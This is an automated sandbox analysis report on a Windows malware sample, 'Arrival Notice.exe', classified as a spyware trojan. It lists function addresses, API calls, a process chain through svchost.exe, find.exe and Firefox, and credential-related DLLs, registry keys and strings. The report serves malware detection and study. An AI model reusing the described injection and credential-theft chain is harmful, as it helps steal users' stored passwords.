Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03831460	7_2_03831460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385FB80	7_2_0385FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B5BF0	7_2_038B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0387DBF9	7_2_0387DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FFB76	7_2_038FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DDAAC	7_2_038DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03885AA0	7_2_03885AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E1AA3	7_2_038E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038EDAC6	7_2_038EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FFA49	7_2_038FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F7A46	7_2_038F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B3A6C	7_2_038B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D5910	7_2_038D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03849950	7_2_03849950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385B950	7_2_0385B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038438E0	7_2_038438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AD800	7_2_038AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03841F92	7_2_03841F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FFFB1	7_2_038FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03803FD2	7_2_03803FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03803FD5	7_2_03803FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FFF09	7_2_038FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03849EB0	7_2_03849EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385FDC0	7_2_0385FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03843D40	7_2_03843D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F1D5A	7_2_038F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F7D73	7_2_038F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FFCF2	7_2_038FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B9C32	7_2_038B9C32
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FA02C0	10_2_02FA02C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FC0274	10_2_02FC0274
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F2E3F0	10_2_02F2E3F0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FE03E6	10_2_02FE03E6
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FDA352	10_2_02FDA352
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FB2000	10_2_02FB2000
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FD81CC	10_2_02FD81CC
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FE01AA	10_2_02FE01AA
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FA8158	10_2_02FA8158
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FBA118	10_2_02FBA118
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F10100	10_2_02F10100
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F3C6E0	10_2_02F3C6E0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F1C7C0	10_2_02F1C7C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F20770	10_2_02F20770
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F44750	10_2_02F44750
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FCE4F6	10_2_02FCE4F6
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FD2446	10_2_02FD2446
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FE0591	10_2_02FE0591
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F20535	10_2_02F20535
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F1EA80	10_2_02F1EA80
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FD6BD7	10_2_02FD6BD7
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FDAB40	10_2_02FDAB40
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F4E8F0	10_2_02F4E8F0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F068B8	10_2_02F068B8
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F22840	10_2_02F22840
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F2A840	10_2_02F2A840
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F229A0	10_2_02F229A0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FEA9A6	10_2_02FEA9A6
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F36962	10_2_02F36962
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FDEEDB	10_2_02FDEEDB
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F32E90	10_2_02F32E90
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FDCE93	10_2_02FDCE93
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F20E59	10_2_02F20E59
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FDEE26	10_2_02FDEE26
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F2CFE0	10_2_02F2CFE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F12FC8	10_2_02F12FC8
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F9EFA0	10_2_02F9EFA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F94F40	10_2_02F94F40
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F40F30	10_2_02F40F30
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F62F28	10_2_02F62F28
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F10CF2	10_2_02F10CF2
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FC0CB5	10_2_02FC0CB5
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F20C00	10_2_02F20C00
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F1ADE0	10_2_02F1ADE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F38DBF	10_2_02F38DBF
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FBCD1F	10_2_02FBCD1F
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F2AD00	10_2_02F2AD00
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FC12ED	10_2_02FC12ED
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F3B2C0	10_2_02F3B2C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F252A0	10_2_02F252A0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F6739A	10_2_02F6739A
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F0D34C	10_2_02F0D34C
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FD132D	10_2_02FD132D
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FD70E9	10_2_02FD70E9
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FDF0E0	10_2_02FDF0E0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FCF0CC	10_2_02FCF0CC
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F270C0	10_2_02F270C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F2B1B0	10_2_02F2B1B0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F0F172	10_2_02F0F172
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FEB16B	10_2_02FEB16B
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F5516C	10_2_02F5516C
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FD16CC	10_2_02FD16CC
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FDF7B0	10_2_02FDF7B0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F11460	10_2_02F11460
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FDF43F	10_2_02FDF43F
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FBD5B0	10_2_02FBD5B0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FD7571	10_2_02FD7571
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FCDAC6	10_2_02FCDAC6
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F65AA0	10_2_02F65AA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FBDAAC	10_2_02FBDAAC
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F93A6C	10_2_02F93A6C
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FDFA49	10_2_02FDFA49
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FD7A46	10_2_02FD7A46
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F95BF0	10_2_02F95BF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F5DBF9	10_2_02F5DBF9
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F3FB80	10_2_02F3FB80
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FDFB76	10_2_02FDFB76
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F238E0	10_2_02F238E0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F8D800	10_2_02F8D800
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F29950	10_2_02F29950
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F3B950	10_2_02F3B950
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FB5910	10_2_02FB5910
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F29EB0	10_2_02F29EB0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FDFFB1	10_2_02FDFFB1
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F21F92	10_2_02F21F92
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FDFF09	10_2_02FDFF09
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FDFCF2	10_2_02FDFCF2
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F99C32	10_2_02F99C32
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F3FDC0	10_2_02F3FDC0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FD7D73	10_2_02FD7D73
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02FD1D5A	10_2_02FD1D5A
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F23D40	10_2_02F23D40
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02551E10	10_2_02551E10
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02553690	10_2_02553690
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02555440	10_2_02555440
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_0256B940	10_2_0256B940
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_0254CF70	10_2_0254CF70
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_0254AFF0	10_2_0254AFF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_0254CD50	10_2_0254CD50
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02DBE268	10_2_02DBE268
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02DBE383	10_2_02DBE383
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02DC532C	10_2_02DC532C
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02DBD7E8	10_2_02DBD7E8
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02DBE723	10_2_02DBE723
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02DBCA88	10_2_02DBCA88
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02DBE8AC	10_2_02DBE8AC

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03887E54 appears 102 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0382B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03875130 appears 58 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 02F55130 appears 57 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 02F0B970 appears 272 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 02F8EA12 appears 86 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 02F67E54 appears 101 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 02F9F290 appears 105 times
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: String function: 00445AE0 appears 65 times

Source: Arrival Notice.exe, 00000000.00000003.1273175330.0000000003F83000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice.exe
Source: Arrival Notice.exe, 00000000.00000003.1273997691.000000000412D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice.exe

Source: Arrival Notice.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@17/15

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0044AF6C GetLastError,FormatMessageW,

0_2_0044AF6C

Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,		0_2_004333BE
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,		0_2_00464EAE

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,

0_2_0045D619

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,

0_2_004755C4

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0047839D

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

0_2_0043305F

Source: C:\Users\user\Desktop\Arrival Notice.exe

File created: C:\Users\user~1\AppData\Local\Temp\aut3BB3.tmp

Jump to behavior

Source: Arrival Notice.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Arrival Notice.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: find.exe, 0000000A.00000003.1693247139.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000A.00000002.3749879419.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000A.00000003.1691677728.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000A.00000003.1691620554.0000000002AD8000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000A.00000002.3749879419.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000A.00000003.1693247139.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Arrival Notice.exe	ReversingLabs: Detection: 34%
Source: Arrival Notice.exe	Virustotal: Detection: 41%

Source: C:\Users\user\Desktop\Arrival Notice.exe

File read: C:\Users\user\Desktop\Arrival Notice.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Arrival Notice.exe "C:\Users\user\Desktop\Arrival Notice.exe"
Source: C:\Users\user\Desktop\Arrival Notice.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival Notice.exe"
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"
Source: C:\Windows\SysWOW64\find.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Arrival Notice.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival Notice.exe"	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\find.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: find.pdb source: svchost.exe, 00000007.00000002.1493476762.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1493447032.0000000003000000.00000004.00000020.00020000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 00000009.00000002.3753336161.00000000010A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fXkDwRWxFFQGfp.exe, 00000009.00000000.1414853065.0000000000E7E000.00000002.00000001.01000000.00000005.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000000.1572655252.0000000000E7E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: Arrival Notice.exe, 00000000.00000003.1273175330.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice.exe, 00000000.00000003.1274823990.0000000004000000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1388765601.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1494088973.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1494088973.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1386878848.0000000003400000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000A.00000003.1494032634.0000000002B71000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000A.00000002.3755131418.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000A.00000002.3755131418.000000000307E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000A.00000003.1496380330.0000000002D2C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Arrival Notice.exe, 00000000.00000003.1273175330.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice.exe, 00000000.00000003.1274823990.0000000004000000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1388765601.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1494088973.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1494088973.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1386878848.0000000003400000.00000004.00000020.00020000.00000000.sdmp, find.exe, find.exe, 0000000A.00000003.1494032634.0000000002B71000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000A.00000002.3755131418.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000A.00000002.3755131418.000000000307E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000A.00000003.1496380330.0000000002D2C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: find.pdbGCTL source: svchost.exe, 00000007.00000002.1493476762.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1493447032.0000000003000000.00000004.00000020.00020000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 00000009.00000002.3753336161.00000000010A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: find.exe, 0000000A.00000002.3755675493.000000000350C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 0000000A.00000002.3749879419.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000002.3755365047.00000000030BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1808863926.000000001AD4C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: find.exe, 0000000A.00000002.3755675493.000000000350C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 0000000A.00000002.3749879419.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000002.3755365047.00000000030BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1808863926.000000001AD4C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,

0_2_0040EBD0

Source: Arrival Notice.exe

Static PE information: real checksum: 0xa961f should be: 0xed1a3

Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00416CB5 push ecx; ret	0_2_00416CC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004149F5 push es; ret	7_2_004149E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00401865 push ecx; ret	7_2_0040186F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00401870 push ecx; ret	7_2_00401891
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00414969 push es; ret	7_2_004149E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004149D1 push es; ret	7_2_004149E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040333C push ss; ret	7_2_0040334A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004034C0 push eax; ret	7_2_004034C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040D4D4 push ebx; retf	7_2_0040D4D8
